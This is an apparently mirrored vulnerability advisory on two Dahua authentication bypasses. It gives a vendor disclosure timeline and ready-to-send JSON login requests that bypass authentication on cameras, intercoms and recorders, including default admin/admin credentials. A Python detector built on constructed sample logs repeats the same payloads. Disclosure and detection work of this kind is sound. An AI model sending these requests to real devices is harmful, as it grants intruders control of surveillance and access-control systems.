## https://sploitus.com/exploit?id=PACKETSTORM:164423
  
Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)  
  
Attack vector: Remote  
Authentication: Anonymous (no credentials needed)  
Researcher: bashis <mcw noemail eu> (2021)  
Limited Disclosure: September 6, 2021  
Full Disclosure: October 6, 2021  
PoC: https://github.com/mcw0/DahuaConsole  
  
-=[Dahua]=-  
Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957  
Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware  
  
-=[Timeline]=-  
June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)  
June 17, 2021: Sent reminder to Dahua PSIRT  
June 18, 2021: Asked IPVM for help to get in contact with Dahua  
June 18, 2021: Received ACK from IPVM, told they sent note to Dahua  
June 19, 2021: ACK received from Dahua PSIRT, asked for additional details  
June 19, 2021: Additional details including PoC sent  
June 21, 2021: ACK received, vulnerabilities confirmed  
June 23, 2021: Dahua PSIRT asked for "coordinated disclosure"  
June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now  
June 24, 2021: Received CVE-2021-33044, I asked about the second CVE  
July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure"  
July 04, 2021: Confirmed "coordinated disclosure", once again  
July 05, 2021: Dahua PSIRT tried to convince me of "Full Disclosure" for the vendor only, and "Limited Disclosure" for the outside world  
July 05, 2021: Disagreed, told them I will let Dahua PSIRT read my note before "Limited Disclosure" on September 6, 2021; "Full Disclosure" will be October 6, 2021  
August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note  
August 30, 2021: Sent my "Limited Disclosure" note  
September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates  
September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices  
September 2, 2021: Dahua PSIRT pointed to the overseas website, asked what models I have so Dahua could release firmware  
September 2, 2021: Refused to provide details, as I expect to be able to find the firmware on their website myself  
September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches  
September 6, 2021: Limited Disclosure  
October 6, 2021: Full Disclosure  
  
  
-=[NetKeyboard Vulnerability]=-  
  
CVE-2021-33044  
  
Vulnerability:  
"clientType": "NetKeyboard",  
Vulnerable device types: IPC/VTH/VTO (tested)  
Vulnerable Firmware: Devices that do not support the "NetKeyboard" functionality (firmware older than June 2021)  
Protocol: DHIP and HTTP/HTTPS  
  
Details:  
Details:  
Sending the "clientType" value shown above under "Vulnerability" to one of the "Vulnerable device types" in the 1st or 2nd "global.login" request simply bypasses authentication.  
  
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}  
  
[Example]  

```json
{
  "method": "global.login",
  "params": {
    "userName": "admin",
    "loginType": "Direct",
    "clientType": "NetKeyboard",
    "authorityType": "Default",
    "passwordType": "Default",
    "password": "Not Used"
  },
  "id": 1,
  "session": 0
}
```
  
-=[Loopback Vulnerability]=-  
  
CVE-2021-33045  
  
Vulnerability:  
"ipAddr": "127.0.0.1",  
"loginType": "Loopback",  
"clientType": "Local",  
  
Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)  
Vulnerable Firmware: Firmware version older than beginning/mid 2020.  
Protocol: DHIP  
  
Details:  
Sending the "ipAddr", "loginType" and "clientType" values shown above under "Vulnerability" to one of the "Vulnerable device types" in the 1st or 2nd "global.login" request makes the device treat the login as coming from "loopback", and therefore bypasses legitimate authentication.  
  
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}  
  
  
[Example]  
Random MD5 hash with login/password: admin/admin  

```json
{
  "method": "global.login",
  "params": {
    "userName": "admin",
    "ipAddr": "127.0.0.1",
    "loginType": "Loopback",
    "clientType": "Local",
    "authorityType": "Default",
    "passwordType": "Default",
    "password": "[REDACTED]"
  },
  "id": 1,
  "session": 0
}
```
  
Plain text with login/password: admin/admin  

```json
{
  "method": "global.login",
  "params": {
    "userName": "admin",
    "ipAddr": "127.0.0.1",
    "loginType": "Loopback",
    "clientType": "Local",
    "authorityType": "Default",
    "passwordType": "Plain",
    "password": "admin"
  },
  "id": 1,
  "session": 0
}
```
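The two bypasses above share one detection opportunity: both live entirely in the parameters of the "global.login" request, so a proxy, IDS or device-side log that records the login body together with the client's source address can flag them before (or while) looking for the `"result":true` success response. The following detector is an added example written for this page; it is not part of the advisory or of the DahuaConsole PoC. It assumes a simple JSON-lines log format (one object per line with a `src` field for the client address and a `body` field holding the DHIP/HTTP request body); both the format and the sample records are constructed for illustration. It flags any login with `"clientType": "NetKeyboard"` (CVE-2021-33044) and any `"loginType": "Loopback"` login that does not actually originate from a loopback address (CVE-2021-33045), so a genuine local client is not reported.

```python
import json
from typing import Dict, List, Optional

# Constructed sample log (not real captures). Each line: {"src": <client address>, "body": <request>}.
# Line 1: NetKeyboard bypass attempt (CVE-2021-33044).
# Line 2: Loopback bypass attempt from a remote address (CVE-2021-33045).
# Line 3: ordinary login with a benign, constructed clientType value.
# Line 4: non-login traffic.
# Line 5: Loopback login that really comes from 127.0.0.1 (should not be flagged).
SAMPLE_LOG = """
{"src": "192.0.2.10", "body": {"method": "global.login", "params": {"userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "passwordType": "Default", "password": "Not Used"}, "id": 1, "session": 0}}
{"src": "192.0.2.11", "body": {"method": "global.login", "params": {"userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "passwordType": "Plain", "password": "admin"}, "id": 1, "session": 0}}
{"src": "192.0.2.12", "body": {"method": "global.login", "params": {"userName": "operator", "loginType": "Direct", "clientType": "Web3.0", "passwordType": "Default", "password": "<hash>"}, "id": 1, "session": 0}}
{"src": "192.0.2.13", "body": {"method": "global.keepAlive", "params": {"timeout": 60}, "id": 2, "session": 12345}}
{"src": "127.0.0.1", "body": {"method": "global.login", "params": {"userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "passwordType": "Plain", "password": "x"}, "id": 1, "session": 0}}
""".strip()

LOOPBACK_SOURCES = {"127.0.0.1", "::1"}


def classify_login(src_ip: str, body: Dict) -> Optional[str]:
    """Return the CVE identifier matching a suspicious global.login request, else None."""
    if body.get("method") != "global.login":
        return None
    params = body.get("params") or {}
    # CVE-2021-33044: the NetKeyboard client type is accepted without a valid password.
    if params.get("clientType") == "NetKeyboard":
        return "CVE-2021-33044"
    # CVE-2021-33045: a "Loopback" login is only plausible from the device itself;
    # the same request arriving from any other address is a spoofed loopback login.
    if params.get("loginType") == "Loopback" and src_ip not in LOOPBACK_SOURCES:
        return "CVE-2021-33045"
    return None


def login_succeeded(response: Dict) -> bool:
    """True for the success shape quoted in the advisory: result true plus a session id."""
    return response.get("result") is True and "session" in response


def scan_log(text: str) -> List[Dict]:
    """Scan JSON-lines log text and return one hit record per suspicious login request."""
    hits = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        raw = raw.strip()
        if not raw:
            continue
        try:
            rec = json.loads(raw)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the whole scan
        body = rec.get("body") or {}
        cve = classify_login(rec.get("src", ""), body)
        if cve:
            hits.append({
                "line": lineno,
                "src": rec.get("src"),
                "cve": cve,
                "user": (body.get("params") or {}).get("userName"),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['cve']} from {hit['src']} as user {hit['user']}")
```

A hit on its own only proves an attempt; pairing it with the device's reply through `login_succeeded` tells you whether the firmware in front of you is still vulnerable, which is the signal to prioritise the firmware update from Dahua's advisory and to keep the DHIP/HTTP management ports off untrusted networks in the meantime.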
  